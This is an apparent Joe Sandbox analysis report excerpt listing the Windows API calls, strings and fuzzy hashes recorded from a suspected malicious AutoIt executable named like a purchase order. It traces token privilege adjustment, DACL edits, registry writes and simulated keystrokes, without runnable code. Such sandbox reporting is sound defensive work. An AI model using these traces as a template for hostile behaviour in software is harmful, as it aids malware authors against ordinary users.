  • Part of subcall function 00C14B6A: FreeLibrary.KERNEL32(00000000), ref: 00C14BA4
  • Part of subcall function 00C14C70: _memmove.LIBCMT ref: 00C14CBA
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __lock_file.LIBCMT ref: 00C348A6
  • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• FreeLibrary.KERNEL32(?,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E7E
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
  • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 017E0FA1
Memory Dump Source
• Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 017E0FA1
Memory Dump Source
• Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C9CB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CB95
• GetWindowLongW.USER32(?,000000F0), ref: 00C9CBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CC00
• SendMessageW.USER32 ref: 00C9CC29
• _wcsncpy.LIBCMT ref: 00C9CC95
• GetKeyState.USER32(00000011), ref: 00C9CCB6
• GetKeyState.USER32(00000009), ref: 00C9CCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C9CCD9
• GetKeyState.USER32(00000010), ref: 00C9CCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C9CD0C
• SendMessageW.USER32 ref: 00C9CD33
• SendMessageW.USER32(?,00001030,?,00C9B348), ref: 00C9CE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C9CE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C9CE60
• SetCapture.USER32(?), ref: 00C9CE69
• ClientToScreen.USER32(?,?), ref: 00C9CECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C9CEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C9CEF5
• ReleaseCapture.USER32 ref: 00C9CF00
• GetCursorPos.USER32(?), ref: 00C9CF3A
• ScreenToClient.USER32(?,?), ref: 00C9CF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9CFA3
• SendMessageW.USER32 ref: 00C9CFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D00E
• SendMessageW.USER32 ref: 00C9D03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C9D05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C9D06D
• GetCursorPos.USER32(?), ref: 00C9D08D
• ScreenToClient.USER32(?,?), ref: 00C9D09A
• GetParent.USER32(?), ref: 00C9D0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00C9D123
• SendMessageW.USER32 ref: 00C9D154
• ClientToScreen.USER32(?,?), ref: 00C9D1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C9D1E2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00C9D20C
• SendMessageW.USER32 ref: 00C9D22F
• ClientToScreen.USER32(?,?), ref: 00C9D281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C9D2B5
  • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
• GetWindowLongW.USER32(?,000000F0), ref: 00C9D351
Strings
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3977979337-4164748364
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C984D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: _memmove$_memset
                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                    • API String ID: 1357608183-1798697756
                                                                    • Opcode ID: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                    • Instruction ID: 3fb9ba030af071a5dcdb016f63b5607a2684a86837d883f94440849b9610ec54
                                                                    • Opcode Fuzzy Hash: 0eea4173859ceeebee71789d4768b69f7a748f2e9e222fbfb051b5d2d760927e
                                                                    • Instruction Fuzzy Hash: E193BF75E04229DFDB24CF98D8C1BADB7B1FF48310F24816AE955AB281E7709E81DB50
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00C148DF
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4D665
                                                                    • IsIconic.USER32(?), ref: 00C4D66E
                                                                    • ShowWindow.USER32(?,00000009), ref: 00C4D67B
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D685
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C4D69B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C4D6A2
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4D6AE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6BF
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C4D6C7
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C4D6CF
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D6D2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6E7
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D6F2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D6FC
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D701
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D70A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D70F
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4D719
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00C4D71E
                                                                    • SetForegroundWindow.USER32(?), ref: 00C4D721
                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00C4D748
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                    • Instruction ID: 637dd5f2b0f1fb5717d33f81949e4e4367dd7ee13056f5f412911b798871c5c9
                                                                    • Opcode Fuzzy Hash: c16a342a7b6b241b31122df26f5b6ad9fd6459f6e48e7b380290a3b21b45fc08
                                                                    • Instruction Fuzzy Hash: 1A314571A40318BBEB216F619C49F7F7F6CEB44B50F11402AFA05EA1D1C6B05D51AAA1
                                                                    APIs
                                                                      • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                      • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                      • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                    • _memset.LIBCMT ref: 00C68353
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C683A5
                                                                    • CloseHandle.KERNEL32(?), ref: 00C683B6
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C683CD
                                                                    • GetProcessWindowStation.USER32 ref: 00C683E6
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00C683F0
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C6840A
                                                                      • Part of subcall function 00C681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                      • Part of subcall function 00C681CB: CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: bdf3dadcb2996f842804185662ce19d364a7d992b5d7277e913651bbb5f7730e
                                                                    • Instruction ID: a78d187e49eb4bc22b7acc0cb93f85ca13b1ba189baea2d834f832702a81105d
                                                                    • Opcode Fuzzy Hash: bdf3dadcb2996f842804185662ce19d364a7d992b5d7277e913651bbb5f7730e
                                                                    • Instruction Fuzzy Hash: AB814071900209AFDF21DFA4DC89BEE7B79FF04304F14426AF925A6161DB318E19EB20
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7C78D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7C7E1
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C806
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C81D
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C844
                                                                    • __swprintf.LIBCMT ref: 00C7C890
                                                                    • __swprintf.LIBCMT ref: 00C7C8D3
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • __swprintf.LIBCMT ref: 00C7C927
                                                                      • Part of subcall function 00C33698: __woutput_l.LIBCMT ref: 00C336F1
                                                                    • __swprintf.LIBCMT ref: 00C7C975
                                                                      • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C33713
                                                                      • Part of subcall function 00C33698: __flsbuf.LIBCMT ref: 00C3372B
                                                                    • __swprintf.LIBCMT ref: 00C7C9C4
                                                                    • __swprintf.LIBCMT ref: 00C7CA13
                                                                    • __swprintf.LIBCMT ref: 00C7CA62
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 3953360268-2428617273
                                                                    • Opcode ID: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                    • Instruction ID: 12b66028afbc954a169018646fb708e696d260a35c2c9fad8e0f359d6224f6f7
                                                                    • Opcode Fuzzy Hash: 579b79f4c0e62b59066fa65bbb633324643fcae6a89bba1daf571d02a17ae62e
                                                                    • Instruction Fuzzy Hash: FCA14BB1408245ABC700EFA4C896EEFB7ECFF85700F40492DF595C6191EA30DA49EB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C7EFB6
                                                                    • _wcscmp.LIBCMT ref: 00C7EFCB
                                                                    • _wcscmp.LIBCMT ref: 00C7EFE2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00C7EFF4
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00C7F00E
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F026
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F031
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F04D
                                                                    • _wcscmp.LIBCMT ref: 00C7F074
                                                                    • _wcscmp.LIBCMT ref: 00C7F08B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F09D
                                                                    • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F0BB
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F0C5
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F0D2
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F0E4
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                    • Instruction ID: b0d100b15f463f1c4a3f769531ec4ad66dc48bce33299448fb6d78026675da53
                                                                    • Opcode Fuzzy Hash: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                    • Instruction Fuzzy Hash: 0031C3325012186BDB14AFB4DC8DFEE77ACAF48360F14817AE818D21A1DB70DB46DA61
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C90953
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C9F910,00000000,?,00000000,?,?), ref: 00C909C1
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C90A09
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C90A92
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00C90DB2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C90DBF
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 328d3fb9d88a06ffec29d75549119799e8fcce6df4947de6b96a86a6310317af
                                                                    • Instruction ID: eebcd1f39f1770776b18693cd4d6bdfa3c63c1eb7e7b24e3a51a839aecf6bb34
                                                                    • Opcode Fuzzy Hash: 328d3fb9d88a06ffec29d75549119799e8fcce6df4947de6b96a86a6310317af
                                                                    • Instruction Fuzzy Hash: CF029E756006019FDB14EF14C895E6AB7E5FF8A710F14855CF89A9B3A2CB30EE41EB81
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C7F113
                                                                    • _wcscmp.LIBCMT ref: 00C7F128
                                                                    • _wcscmp.LIBCMT ref: 00C7F13F
                                                                      • Part of subcall function 00C74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C743A0
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F16E
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F179
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F195
                                                                    • _wcscmp.LIBCMT ref: 00C7F1BC
                                                                    • _wcscmp.LIBCMT ref: 00C7F1D3
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F1E5
                                                                    • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F203
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F20D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F21A
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F22C
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                    • Instruction ID: a0fa86ef0fc6ea36a102ea368267b82decd04400b448fd972288f02da7bab3c4
                                                                    • Opcode Fuzzy Hash: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                    • Instruction Fuzzy Hash: 0D31C536500219ABDB14AFB4EC89FEE77AC9F45360F14817AE818E20A1DB30DF46DA54
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7A20F
                                                                    • __swprintf.LIBCMT ref: 00C7A231
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7A26E
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C7A293
                                                                    • _memset.LIBCMT ref: 00C7A2B2
                                                                    • _wcsncpy.LIBCMT ref: 00C7A2EE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C7A323
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C7A32E
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00C7A337
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C7A341
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                    • Instruction ID: 0d268509504b66f407b013a59d2c2a73bc1fce52d43193fcb1052af953302de2
                                                                    • Opcode Fuzzy Hash: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                    • Instruction Fuzzy Hash: 62319EB1904109ABDB219FA0DC49FEF77BCEF88740F1041BAF919D2161EB7497458B25
                                                                    APIs
                                                                      • Part of subcall function 00C68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
                                                                      • Part of subcall function 00C68202: GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
                                                                      • Part of subcall function 00C68202: GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
                                                                      • Part of subcall function 00C68202: HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
                                                                      • Part of subcall function 00C68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255
                                                                      • Part of subcall function 00C6829F: GetProcessHeap.KERNEL32(00000008,00C67CF8,00000000,00000000,?,00C67CF8,?), ref: 00C682AB
                                                                      • Part of subcall function 00C6829F: HeapAlloc.KERNEL32(00000000,?,00C67CF8,?), ref: 00C682B2
                                                                      • Part of subcall function 00C6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C67CF8,?), ref: 00C682C3
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C67D13
                                                                    • _memset.LIBCMT ref: 00C67D28
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C67D47
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00C67D58
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00C67D95
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C67DB1
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00C67DCE
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C67DDD
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00C67DE4
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C67E05
                                                                    • CopySid.ADVAPI32(00000000), ref: 00C67E0C
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C67E3D
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C67E63
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C67E77
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: 5eaaf1b9b04399048e6cd454baae13b7b61805a573409c589740f3d169658e7d
                                                                    • Instruction ID: 2a96c9d185623ff89dd51e28fd15b95a175177e446463475868b1cffe7b43032
                                                                    • Opcode Fuzzy Hash: 5eaaf1b9b04399048e6cd454baae13b7b61805a573409c589740f3d169658e7d
                                                                    • Instruction Fuzzy Hash: 18615E71904109AFDF10DFA4DC85AEEBB79FF04704F14866AF825E6291DB319A16CB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
